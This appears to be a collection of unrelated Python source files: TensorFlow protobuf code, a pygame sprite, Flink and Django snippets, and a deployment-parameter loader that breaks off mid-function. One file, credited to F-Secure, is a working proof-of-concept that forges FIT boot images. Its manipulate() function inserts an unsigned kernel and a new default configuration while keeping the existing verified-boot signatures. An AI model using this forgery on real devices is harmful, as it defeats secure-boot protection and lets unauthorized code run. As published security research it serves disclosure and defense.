_DEBUGGEDSOURCEFILE = _descriptor.Descriptor(
name='DebuggedSourceFile',
full_name='tensorflow.DebuggedSourceFile',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='host', full_name='tensorflow.DebuggedSourceFile.host', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='file_path', full_name='tensorflow.DebuggedSourceFile.file_path', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='last_modified', full_name='tensorflow.DebuggedSourceFile.last_modified', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='bytes', full_name='tensorflow.DebuggedSourceFile.bytes', index=3,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='lines', full_name='tensorflow.DebuggedSourceFile.lines', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=326,
serialized_end=432,
)
_DEBUGGEDSOURCEFILES = _descriptor.Descriptor(
name='DebuggedSourceFiles',
full_name='tensorflow.DebuggedSourceFiles',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source_files', full_name='tensorflow.DebuggedSourceFiles.source_files', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=434,
serialized_end=509,
)
_DEBUGOPTIONS.fields_by_name['debug_tensor_watch_opts'].message_type = _DEBUGTENSORWATCH
_DEBUGGEDSOURCEFILES.fields_by_name['source_files'].message_type = _DEBUGGEDSOURCEFILE
DESCRIPTOR.message_types_by_name['DebugTensorWatch'] = _DEBUGTENSORWATCH
DESCRIPTOR.message_types_by_name['DebugOptions'] = _DEBUGOPTIONS
DESCRIPTOR.message_types_by_name['DebuggedSourceFile'] = _DEBUGGEDSOURCEFILE
DESCRIPTOR.message_types_by_name['DebuggedSourceFiles'] = _DEBUGGEDSOURCEFILES
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DebugTensorWatch = _reflection.GeneratedProtocolMessageType('DebugTensorWatch', (_message.Message,), {
'DESCRIPTOR' : _DEBUGTENSORWATCH,
'__module__' : 'stfsclient.tensorflow.debug_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.DebugTensorWatch)
})
_sym_db.RegisterMessage(DebugTensorWatch)
DebugOptions = _reflection.GeneratedProtocolMessageType('DebugOptions', (_message.Message,), {
'DESCRIPTOR' : _DEBUGOPTIONS,
'__module__' : 'stfsclient.tensorflow.debug_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.DebugOptions)
})
_sym_db.RegisterMessage(DebugOptions)
DebuggedSourceFile = _reflection.GeneratedProtocolMessageType('DebuggedSourceFile', (_message.Message,), {
'DESCRIPTOR' : _DEBUGGEDSOURCEFILE,
'__module__' : 'stfsclient.tensorflow.debug_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.DebuggedSourceFile)
})
_sym_db.RegisterMessage(DebuggedSourceFile)
DebuggedSourceFiles = _reflection.GeneratedProtocolMessageType('DebuggedSourceFiles', (_message.Message,), {
'DESCRIPTOR' : _DEBUGGEDSOURCEFILES,
'__module__' : 'stfsclient.tensorflow.debug_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.DebuggedSourceFiles)
})
_sym_db.RegisterMessage(DebuggedSourceFiles)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
py | b4110546a7e3cbb0b29bc933b82bc9d946af9b60 | import pygame
from pygame.sprite import Sprite
class Alien(Sprite):
"""表示单个外星人的类"""
def __init__(self, ai_settings, screen):
"""初始化外星人并设置其起始位置"""
super(Alien, self).__init__()
self.screen = screen
self.ai_settings = ai_settings
# 加载外星人图像,并设置其rect属性
self.image = pygame.image.load('images/alien.bmp')
self.rect = self.image.get_rect()
# 每个外星人最初都在屏幕左上角附近
self.rect.x = self.rect.width
self.rect.y = self.rect.height
# 存储外星人的准确位置
self.x = float(self.rect.x)
def blitme(self):
"""在指定位置绘制外星人"""
self.screen.blit(self.image, self.rect)
def check_edges(self):
"""如果外星人位于屏幕边缘,就返回True"""
screen_rect = self.screen.get_rect()
if self.rect.right >= screen_rect.right:
return True
elif self.rect.left <= 0:
return True
def update(self):
"""向左或向右移动外星人"""
self.x += (self.ai_settings.alien_speed_factor *
self.ai_settings.fleet_direction)
self.rect.x = self.x |
py | b41105bd0e3226ed013a6d80e480b0e8b10e2620 | #!/usr/bin/python3
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2020, F-Secure Corporation, https://foundry.f-secure.com
#
# pylint: disable=E1101,W0201,C0103
"""
Verified boot image forgery tools and utilities
This module provides services to both take apart and regenerate FIT images
in a way that preserves all existing verified boot signatures, unless you
manipulate nodes in the process.
"""
import struct
import binascii
from io import BytesIO
#
# struct parsing helpers
#
class BetterStructMeta(type):
"""
Preprocesses field definitions and creates a struct.Struct instance from them
"""
def __new__(cls, clsname, superclasses, attributedict):
if clsname != 'BetterStruct':
fields = attributedict['__fields__']
field_types = [_[0] for _ in fields]
field_names = [_[1] for _ in fields if _[1] is not None]
attributedict['__names__'] = field_names
s = struct.Struct(attributedict.get('__endian__', '') + ''.join(field_types))
attributedict['__struct__'] = s
attributedict['size'] = s.size
return type.__new__(cls, clsname, superclasses, attributedict)
class BetterStruct(metaclass=BetterStructMeta):
"""
Base class for better structures
"""
def __init__(self):
for t, n in self.__fields__:
if 's' in t:
setattr(self, n, '')
elif t in ('Q', 'I', 'H', 'B'):
setattr(self, n, 0)
@classmethod
def unpack_from(cls, buffer, offset=0):
"""
Unpack structure instance from a buffer
"""
fields = cls.__struct__.unpack_from(buffer, offset)
instance = cls()
for n, v in zip(cls.__names__, fields):
setattr(instance, n, v)
return instance
def pack(self):
"""
Pack structure instance into bytes
"""
return self.__struct__.pack(*[getattr(self, n) for n in self.__names__])
def __str__(self):
items = ["'%s': %s" % (n, repr(getattr(self, n))) for n in self.__names__ if n is not None]
return '(' + ', '.join(items) + ')'
#
# some defs for flat DT data
#
class HeaderV17(BetterStruct):
__endian__ = '>'
__fields__ = [
('I', 'magic'),
('I', 'totalsize'),
('I', 'off_dt_struct'),
('I', 'off_dt_strings'),
('I', 'off_mem_rsvmap'),
('I', 'version'),
('I', 'last_comp_version'),
('I', 'boot_cpuid_phys'),
('I', 'size_dt_strings'),
('I', 'size_dt_struct'),
]
class RRHeader(BetterStruct):
__endian__ = '>'
__fields__ = [
('Q', 'address'),
('Q', 'size'),
]
class PropHeader(BetterStruct):
__endian__ = '>'
__fields__ = [
('I', 'value_size'),
('I', 'name_offset'),
]
# magical constants for DTB format
OF_DT_HEADER = 0xd00dfeed
OF_DT_BEGIN_NODE = 1
OF_DT_END_NODE = 2
OF_DT_PROP = 3
OF_DT_END = 9
class StringsBlock:
"""
Represents a parsed device tree string block
"""
def __init__(self, values=None):
if values is None:
self.values = []
else:
self.values = values
def __getitem__(self, at):
if isinstance(at, str):
offset = 0
for value in self.values:
if value == at:
break
offset += len(value) + 1
else:
self.values.append(at)
return offset
if isinstance(at, int):
offset = 0
for value in self.values:
if offset == at:
return value
offset += len(value) + 1
raise IndexError('no string found corresponding to the given offset')
raise TypeError('only strings and integers are accepted')
class Prop:
"""
Represents a parsed device tree property
"""
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def clone(self):
return Prop(self.name, self.value)
def __repr__(self):
return "<Prop(name='%s', value=%s>" % (self.name, repr(self.value))
class Node:
"""
Represents a parsed device tree node
"""
def __init__(self, name=None):
self.name = name
self.props = []
self.children = []
def clone(self):
o = Node(self.name)
o.props = [x.clone() for x in self.props]
o.children = [x.clone() for x in self.children]
return o
def __getitem__(self, index):
return self.children[index]
def __repr__(self):
return "<Node('%s'), %s, %s>" % (self.name, repr(self.props), repr(self.children))
#
# flat DT to memory
#
def parse_strings(strings):
"""
Converts the bytes into a StringsBlock instance so it is convenient to work with
"""
strings = strings.split(b'\x00')
return StringsBlock(strings)
def parse_struct(stream):
"""
Parses DTB structure(s) into a Node or Prop instance
"""
tag = bytearray(stream.read(4))[3]
if tag == OF_DT_BEGIN_NODE:
name = b''
while b'\x00' not in name:
name += stream.read(4)
name = name.rstrip(b'\x00')
node = Node(name)
item = parse_struct(stream)
while item is not None:
if isinstance(item, Node):
node.children.append(item)
elif isinstance(item, Prop):
node.props.append(item)
item = parse_struct(stream)
return node
if tag == OF_DT_PROP:
h = PropHeader.unpack_from(stream.read(PropHeader.size))
length = (h.value_size + 3) & (~3)
value = stream.read(length)[:h.value_size]
prop = Prop(h.name_offset, value)
return prop
if tag in (OF_DT_END_NODE, OF_DT_END):
return None
raise ValueError('unexpected tag value')
def read_fdt(fp):
"""
Reads and parses the flattened device tree (or derivatives like FIT)
"""
header = HeaderV17.unpack_from(fp.read(HeaderV17.size))
if header.magic != OF_DT_HEADER:
raise ValueError('invalid magic value %08x; expected %08x' % (header.magic, OF_DT_HEADER))
# TODO: read/parse reserved regions
fp.seek(header.off_dt_struct)
structs = fp.read(header.size_dt_struct)
fp.seek(header.off_dt_strings)
strings = fp.read(header.size_dt_strings)
strblock = parse_strings(strings)
root = parse_struct(BytesIO(structs))
return root, strblock
#
# memory to flat DT
#
def compose_structs_r(item):
"""
Recursive part of composing Nodes and Props into a bytearray
"""
t = bytearray()
if isinstance(item, Node):
t.extend(struct.pack('>I', OF_DT_BEGIN_NODE))
if isinstance(item.name, str):
item.name = bytes(item.name, 'utf-8')
name = item.name + b'\x00'
if len(name) & 3:
name += b'\x00' * (4 - (len(name) & 3))
t.extend(name)
for p in item.props:
t.extend(compose_structs_r(p))
for c in item.children:
t.extend(compose_structs_r(c))
t.extend(struct.pack('>I', OF_DT_END_NODE))
elif isinstance(item, Prop):
t.extend(struct.pack('>I', OF_DT_PROP))
value = item.value
h = PropHeader()
h.name_offset = item.name
if value:
h.value_size = len(value)
t.extend(h.pack())
if len(value) & 3:
value += b'\x00' * (4 - (len(value) & 3))
t.extend(value)
else:
h.value_size = 0
t.extend(h.pack())
return t
def compose_structs(root):
"""
Composes the parsed Nodes into a flat bytearray instance
"""
t = compose_structs_r(root)
t.extend(struct.pack('>I', OF_DT_END))
return t
def compose_strings(strblock):
"""
Composes the StringsBlock instance back into a bytearray instance
"""
b = bytearray()
for s in strblock.values:
b.extend(s)
b.append(0)
return bytes(b)
def write_fdt(root, strblock, fp):
"""
Writes out a complete flattened device tree (or FIT)
"""
header = HeaderV17()
header.magic = OF_DT_HEADER
header.version = 17
header.last_comp_version = 16
fp.write(header.pack())
header.off_mem_rsvmap = fp.tell()
fp.write(RRHeader().pack())
structs = compose_structs(root)
header.off_dt_struct = fp.tell()
header.size_dt_struct = len(structs)
fp.write(structs)
strings = compose_strings(strblock)
header.off_dt_strings = fp.tell()
header.size_dt_strings = len(strings)
fp.write(strings)
header.totalsize = fp.tell()
fp.seek(0)
fp.write(header.pack())
#
# pretty printing / converting to DT source
#
def as_bytes(value):
return ' '.join(["%02X" % x for x in value])
def prety_print_value(value):
"""
Formats a property value as appropriate depending on the guessed data type
"""
if not value:
return '""'
if value[-1] == b'\x00':
printable = True
for x in value[:-1]:
x = ord(x)
if x != 0 and (x < 0x20 or x > 0x7F):
printable = False
break
if printable:
value = value[:-1]
return ', '.join('"' + x + '"' for x in value.split(b'\x00'))
if len(value) > 0x80:
return '[' + as_bytes(value[:0x80]) + ' ... ]'
return '[' + as_bytes(value) + ']'
def pretty_print_r(node, strblock, indent=0):
"""
Prints out a single node, recursing further for each of its children
"""
spaces = ' ' * indent
print((spaces + '%s {' % (node.name.decode('utf-8') if node.name else '/')))
for p in node.props:
print((spaces + ' %s = %s;' % (strblock[p.name].decode('utf-8'), prety_print_value(p.value))))
for c in node.children:
pretty_print_r(c, strblock, indent+1)
print((spaces + '};'))
def pretty_print(node, strblock):
"""
Generates an almost-DTS formatted printout of the parsed device tree
"""
print('/dts-v1/;')
pretty_print_r(node, strblock, 0)
#
# manipulating the DT structure
#
def manipulate(root, strblock):
"""
Maliciously manipulates the structure to create a crafted FIT file
"""
# locate /images/kernel-1 (frankly, it just expects it to be the first one)
kernel_node = root[0][0]
# clone it to save time filling all the properties
fake_kernel = kernel_node.clone()
# rename the node
fake_kernel.name = b'kernel-2'
# get rid of signatures/hashes
fake_kernel.children = []
# NOTE: this simply replaces the first prop... either description or data
# should be good for testing purposes
fake_kernel.props[0].value = b'Super 1337 kernel\x00'
# insert the new kernel node under /images
root[0].children.append(fake_kernel)
# modify the default configuration
root[1].props[0].value = b'conf-2\x00'
# clone the first (only?) configuration
fake_conf = root[1][0].clone()
# rename and change kernel and fdt properties to select the crafted kernel
fake_conf.name = b'conf-2'
fake_conf.props[0].value = b'kernel-2\x00'
fake_conf.props[1].value = b'fdt-1\x00'
# insert the new configuration under /configurations
root[1].children.append(fake_conf)
return root, strblock
def main(argv):
with open(argv[1], 'rb') as fp:
root, strblock = read_fdt(fp)
print("Before:")
pretty_print(root, strblock)
root, strblock = manipulate(root, strblock)
print("After:")
pretty_print(root, strblock)
with open('blah', 'w+b') as fp:
write_fdt(root, strblock, fp)
if __name__ == '__main__':
import sys
main(sys.argv)
# EOF
|
py | b41105d3874e79f724bd3acbd2e6f34464eaf621 | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
from abc import ABC, abstractmethod
class TimerService(ABC):
"""
Interface for working with time and timers.
"""
@abstractmethod
def current_processing_time(self):
"""
Returns the current processing time.
"""
pass
@abstractmethod
def current_watermark(self):
"""
Returns the current event-time watermark.
"""
pass
@abstractmethod
def register_processing_time_timer(self, timestamp: int):
"""
Registers a timer to be fired when processing time passes the given time.
Timers can internally be scoped to keys and/or windows. When you set a timer in a keyed
context, such as in an operation on KeyedStream then that context will so be active when you
receive the timer notification.
:param timestamp: The processing time of the timer to be registered.
"""
pass
@abstractmethod
def register_event_time_timer(self, timestamp: int):
"""
Registers a timer tobe fired when the event time watermark passes the given time.
Timers can internally be scoped to keys and/or windows. When you set a timer in a keyed
context, such as in an operation on KeyedStream then that context will so be active when you
receive the timer notification.
:param timestamp: The event time of the timer to be registered.
"""
pass
def delete_processing_time_timer(self, timestamp: int):
"""
Deletes the processing-time timer with the given trigger time. This method has only an
effect if such a timer was previously registered and did not already expire.
Timers can internally be scoped to keys and/or windows. When you delete a timer, it is
removed from the current keyed context.
:param timestamp: The given trigger time of timer to be deleted.
"""
pass
def delete_event_time_timer(self, timestamp: int):
"""
Deletes the event-time timer with the given trigger time. This method has only an effect if
such a timer was previously registered and did not already expire.
Timers can internally be scoped to keys and/or windows. When you delete a timer, it is
removed from the current keyed context.
:param timestamp: The given trigger time of timer to be deleted.
"""
pass
|
py | b41105fab6b55248e26d50b4e4842fbadff43f98 | import mysql.connector
from fixture.db import DbFixture
from fixture.orm import ORMFixture
from models.group import Group
db = ORMFixture(host='127.0.0.1', name='addressbook', user='root', password='')
try:
l = db.get_contacts_in_group(Group(id='219'))
for item in l:
print(item)
print(len(l))
finally:
pass #db.destroy() |
py | b41106ac6e6c29c31fc3f3d908cd171ba8fa6dd7 | """certificates URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from accounts import views
urlpatterns = [
path('admin/', admin.site.urls),
path('',views.base,name='base'),
path('records/',include('records.urls')),
path('database/',include('database.urls')),
path('accounts/',include('accounts.urls'))
]
|
py | b41106ddeb62c1b08c01f8d974d8422bbec0f1d7 | #!/usr/bin/env python
# Copyright 2016-2017 Nitor Creations Oy
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import str
from builtins import range
import json
import os
import re
import subprocess
import sys
import yaml
import six
from base64 import b64encode
from collections import OrderedDict
from glob import glob
from yaml import ScalarNode, SequenceNode, MappingNode
from numbers import Number
from operator import itemgetter
from botocore.exceptions import ClientError
from copy import copy
from jmespath import search
from ec2_utils.instance_info import (
resolve_account,
stack_params_and_outputs_and_stack,
dthandler,
)
from n_utils import _to_str
from n_utils.utils import (
expand_vars,
expand_only_double_paranthesis_params,
get_images,
ParamNotAvailable,
)
from n_utils.git_utils import Git
from n_utils.ndt import find_include
from n_utils.ecr_utils import repo_uri
from n_utils.tf_utils import pull_state, flat_state, jmespath_var
from n_vault import Vault
from threadlocal_aws import region
from threadlocal_aws.clients import ssm, ec2, connect
from cloudformation_utils.tools import (
process_script_decorated as import_script,
cloudformation_yaml_loads as yaml_load,
)
stacks = dict()
terraforms = dict()
parameters = dict()
ssm_params = dict()
vault_params = dict()
product_amis = dict()
owner_amis = dict()
CFG_PREFIX = "AWS::CloudFormation::Init_config_files_"
CONNECT_INSTANCE_ID = None
############################################################################
# _THE_ yaml & json deserialize/serialize functions
yaml.SafeDumper.yaml_representers[
None
] = lambda self, data: yaml.representer.SafeRepresenter.represent_str(
self,
_to_str(data),
)
SOURCED_PARAMS = None
def run_command(command):
proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
output = proc.communicate()
if proc.returncode:
raise Exception("Failed to run " + str(command))
return output[0]
def _resolve_stackref_from_dict(stack_var):
if "region" in stack_var and "stackName" in stack_var and "paramName" in stack_var:
return _resolve_stackref(
stack_var["region"], stack_var["stackName"], stack_var["paramName"]
)
elif "component" in stack_var and "stack" in stack_var and "paramName" in stack_var:
param_name = stack_var["paramName"]
del stack_var["paramName"]
params = load_parameters(**stack_var)
region = params["REGION"]
stack_name = params["STACK_NAME"]
return _resolve_stackref(region, stack_name, param_name)
else:
return None
def _resolve_stackref(region, stack_name, stack_param):
stack_key = region + "." + stack_name
stack_params = {}
if stack_key in stacks:
stack_params = stacks[stack_key]
else:
stack_params, _ = stack_params_and_outputs_and_stack(
stack_name=stack_name, stack_region=region
)
stacks[stack_key] = stack_params
if stack_param in stack_params:
return stack_params[stack_param]
return None
def _resolve_tfref_from_dict(tfref_var):
if (
"component" in tfref_var
and "terraform" in tfref_var
and ("paramName" in tfref_var or "jmespath" in tfref_var)
):
with Git() as git:
current_branch = git.get_current_branch()
if "branch" in tfref_var:
branch = tfref_var["branch"]
else:
branch = current_branch
tf_key = (tfref_var["component"], tfref_var["terraform"], branch)
if tf_key in terraforms:
terraform = terraforms[tf_key]
else:
root = "."
if branch != current_branch:
root = git.export_branch(branch)
terraform = pull_state(
tfref_var["component"], tfref_var["terraform"], root=root
)
terraforms[tf_key] = terraform
if "paramName" in tfref_var:
flat_state_dict = flat_state(terraform)
if tfref_var["paramName"] in flat_state_dict:
return flat_state_dict[tfref_var["paramName"]]
else:
return None
if "jmespath" in tfref_var:
return jmespath_var(terraform, tfref_var["jmespath"])
else:
return None
def _resolve_ssm_parameter(ssm_key, region=None):
value = None
if ssm_key in ssm_params:
value = ssm_params[ssm_key]
else:
ssm_resp = ssm(region=region).get_parameter(Name=ssm_key, WithDecryption=True)
if "Parameter" in ssm_resp and "Value" in ssm_resp["Parameter"]:
value = ssm_resp["Parameter"]["Value"]
ssm_params[ssm_key] = value
return value
def _resolve_vault_parameter(vault_key):
value = None
if vault_key in vault_params:
value = vault_params[vault_key]
else:
value = Vault().lookup(vault_key)
vault_params[vault_key] = value
return value
def _resolve_product_ami(product_code, region=None):
value = None
if product_code in product_amis:
value = product_amis[product_code]
else:
ami_resp = ec2(region=region).describe_images(
Filters=[{"Name": "product-code", "Values": [product_code]}],
Owners=["aws-marketplace"],
)
ami_ids = [
image["ImageId"]
for image in sorted(
ami_resp["Images"], key=itemgetter("CreationDate"), reverse=True
)
]
if ami_ids:
value = ami_ids[0]
product_amis[product_code] = value
return value
def _resolve_onwer_named_ami(owner, name, region=None):
value = None
if (owner, name) in owner_amis:
return owner_amis[(owner, name)]
else:
ami_resp = ec2(region=region).describe_images(
Owners=[owner], Filters=[{"Name": "name", "Values": [name]}]
)
ami_ids = [
image["ImageId"]
for image in sorted(
ami_resp["Images"], key=itemgetter("CreationDate"), reverse=True
)
]
if ami_ids:
value = ami_ids[0]
owner_amis[(owner, name)] = value
return value
def _resolve_flowref(flowname):
if CONNECT_INSTANCE_ID:
paginator = connect().get_paginator("list_contact_flows")
for page in paginator.paginate(InstanceId=CONNECT_INSTANCE_ID):
for flow in page["ContactFlowSummaryList"]:
if flow["Name"] == flowname:
return flow["Arn"]
return None
def _process_infra_prop_line(line, params, used_params):
key_val = line.split("=", 1)
if len(key_val) == 2:
key = re.sub("[^a-zA-Z0-9_]", "", key_val[0].strip())
if key in os.environ:
value = os.environ[key]
else:
value = key_val[1]
value = _process_value(value, used_params)
params[key] = value
if isinstance(value, six.string_types):
used_params[key] = value
else:
used_params[key] = json_save_small(value)
def _process_value(value, used_params):
if isinstance(value, six.string_types):
if not value.strip():
return ""
value = expand_vars(value, used_params, None, [])
try:
yaml_value = yaml_load(value)
if isinstance(yaml_value, Number):
return value
if not yaml_value is None:
value = yaml_value
except:
pass
value = expand_vars(value, used_params, None, [])
if isinstance(value, six.string_types):
value = value.strip()
elif isinstance(value, OrderedDict):
region = None
if "REGION" in used_params:
region = used_params["REGION"]
# Don't go into external refs if:
# a) resolving base variables like REGION and paramEnvId
# b) resolving basic variables used in terraform backend configuration
if (
"DO_NOT_RESOLVE_EXTERNAL_REFS" not in os.environ
and "TF_INIT_OUTPUT" not in os.environ
):
if "StackRef" in value:
stack_value = _resolve_stackref_from_dict(value["StackRef"])
if stack_value:
value = stack_value
if "TFRef" in value:
tf_value = _resolve_tfref_from_dict(value["TFRef"])
if tf_value:
value = tf_value
if "Encrypt" in value:
enc_conf = value["Encrypt"]
if isinstance(enc_conf, OrderedDict):
to_encrypt = yaml_save(enc_conf["value"])
else:
to_encrypt = enc_conf["value"]
value = _process_value(to_encrypt, used_params)
del enc_conf["value"]
vault = Vault(**enc_conf)
value = b64encode(vault.direct_encrypt(value))
if "YamlRef" in value:
if "file" in value["YamlRef"] and "jmespath" in value["YamlRef"]:
yaml_file = value["YamlRef"]["file"]
contents = yaml_load(open(yaml_file))
value = search(value["YamlRef"]["jmespath"], contents)
if value:
return _process_value(value, used_params)
if "SsmRef" in value:
ssm_key = value["SsmRef"]
ssm_value = _resolve_ssm_parameter(ssm_key, region=region)
if ssm_value:
value = ssm_value
if "ProductAmi" in value:
product_code = value["ProductAmi"]
product_ami = _resolve_product_ami(product_code, region=region)
if product_ami:
value = product_ami
if "OwnerNamedAmi" in value:
if (
"owner" in value["OwnerNamedAmi"]
and "name" in value["OwnerNamedAmi"]
):
owner = value["OwnerNamedAmi"]["owner"]
name = value["OwnerNamedAmi"]["name"]
owner_ami = _resolve_onwer_named_ami(owner, name, region=region)
if owner_ami:
value = owner_ami
if "FlowRef" in value:
flow_value = _resolve_flowref(value["FlowRef"])
if flow_value:
value = flow_value
return value
def joined_file_lines(filename):
with open(filename, "r") as f:
prevline = ""
to_yeild = None
for line in f.readlines():
if prevline.strip().endswith("\\"):
to_yeild = None
prevline = prevline[:-2] + "\n" + line
elif line.startswith(" ") or line.startswith("\t"):
to_yeild = None
prevline = prevline + line
elif line.startswith("#"):
to_yeild = prevline.strip()
prevline = ""
elif prevline:
to_yeild = prevline.strip()
prevline = line
else:
to_yeild = None
prevline = line
if to_yeild:
yield to_yeild
if prevline:
yield prevline.strip()
def import_parameter_file(filename, params):
used_params = OrderedDict(copy(os.environ))
used_params.update(params)
for line in joined_file_lines(filename):
_process_infra_prop_line(line, params, used_params)
def _add_subcomponent_file(component, branch, type, name, files):
if name:
os.environ["ORIG_" + type.upper() + "_NAME"] = name
files.append(
component + os.sep + type + "-" + name + os.sep + "infra.properties"
)
files.append(
component
+ os.sep
+ type
+ "-"
+ name
+ os.sep
+ "infra-"
+ branch
+ ".properties"
)
def resolve_docker_uri(component, uriParam, image_branch, git):
if not git:
git = Git()
with git:
if uriParam in os.environ:
return os.environ[uriParam]
docker = uriParam[14:]
docker_params = load_parameters(
component=component, docker=docker, branch=image_branch, git=git
)
return repo_uri(docker_params["DOCKER_NAME"])
def lreplace(pattern, sub, string):
return sub + string[len(pattern) :] if string.startswith(pattern) else string
def rreplace(pattern, sub, string):
return string[: -len(pattern)] + sub if string.endswith(pattern) else string
def resolve_ami(component_params, component, image, imagebranch, branch, git):
if not git:
git = Git()
with git:
if "paramAmi" + image in os.environ:
return {
"ImageId": os.environ["paramAmi" + image],
"Name": os.environ["paramAmiName" + image]
if "paramAmiName" + image in os.environ
else "Unknown",
}
images = []
image_params = {}
job = ""
if "IMAGE_JOB" in os.environ and not image:
job = re.sub(r"\W", "_", os.environ["IMAGE_JOB"])
else:
image_params = load_parameters(
component=component, image=image, branch=imagebranch, git=git
)
if "JOB_NAME" in image_params:
job = re.sub(r"\W", "_", image_params["JOB_NAME"])
else:
prefix = ""
prefix = image_params["BUILD_JOB_PREFIX"]
job = prefix + "_" + component + "_bake"
if image:
job = job + "_" + image
job = re.sub(r"\W", "_", job)
build_param = "paramAmi" + image + "Build"
latest_baked = (
build_param in component_params
and component_params[build_param] == "latest"
)
if latest_baked:
# get current branch latest images
images = get_images(job)
if (
build_param in component_params
and component_params[build_param] != "latest"
):
# resolve with a specifically set image build number
build = component_params[build_param]
image_tag = job + "_" + build
job_tag_func = (
lambda image, image_name_prefix: len(
[tag for tag in image["Tags"] if tag["Value"] == image_tag]
)
> 0
)
images = get_images(job, job_tag_function=job_tag_func)
elif imagebranch != branch and not latest_baked:
# resolve promote job
suffix = "_bake"
repl_suffix = "_promote"
if image:
suffix += "_" + image
repl_suffix += "_" + image
if not image_params:
image_params = load_parameters(
component=component, image=image, branch=imagebranch, git=git
)
this_branch_prefix = re.sub(
r"\W", "_", component_params["BUILD_JOB_PREFIX"] + "_"
)
image_branch_prefix = re.sub(
r"\W", "_", image_params["BUILD_JOB_PREFIX"] + "_"
)
job = lreplace(image_branch_prefix, this_branch_prefix, job)
job = rreplace(suffix, repl_suffix, job)
images = get_images(job)
else:
# get current branch latest images
images = get_images(job)
if images:
return images[0]
else:
return None
def load_parameters(
component=None,
stack=None,
serverless=None,
docker=None,
image=None,
cdk=None,
terraform=None,
azure=None,
connect=None,
branch=None,
resolve_images=False,
git=None,
):
subc_type = ""
subc_name = ""
if stack:
subc_type = "stack"
subc_name = "stack=" + stack
if serverless:
subc_type = "serverless"
subc_name = "serverless=" + serverless
if docker:
subc_type = "docker"
subc_name = "docker=" + docker
if isinstance(image, six.string_types):
subc_type = "image"
subc_name = "image=" + image
if cdk:
subc_type = "cdk"
subc_name = "cdk=" + cdk
if terraform:
subc_type = "terraform"
subc_name = "terraform=" + terraform
if azure:
subc_type = "azure"
subc_name = "azure=" + azure
if connect:
subc_type = "connect"
subc_name = "connect=" + connect
if not git:
git = Git()
with git:
current_branch = git.get_current_branch()
if not branch:
branch = current_branch
branch = branch.strip().split("origin/")[-1:][0]
params_key = (component, subc_name, branch)
if params_key in parameters:
return parameters[params_key]
ret = {"GIT_BRANCH": branch}
account = resolve_account()
if account:
ret["ACCOUNT_ID"] = account
if component:
ret["COMPONENT"] = component
prefix = ""
if current_branch != branch:
prefix = git.export_branch(branch) + os.sep
files = [
prefix + "branch.properties",
prefix + branch + ".properties",
prefix + "infra.properties",
prefix + "infra-" + branch + ".properties",
]
if component:
files.append(prefix + component + os.sep + "infra.properties")
files.append(
prefix + component + os.sep + "infra-" + branch + ".properties"
)
_add_subcomponent_file(prefix + component, branch, "stack", stack, files)
_add_subcomponent_file(
prefix + component, branch, "serverless", serverless, files
)
_add_subcomponent_file(prefix + component, branch, "cdk", cdk, files)
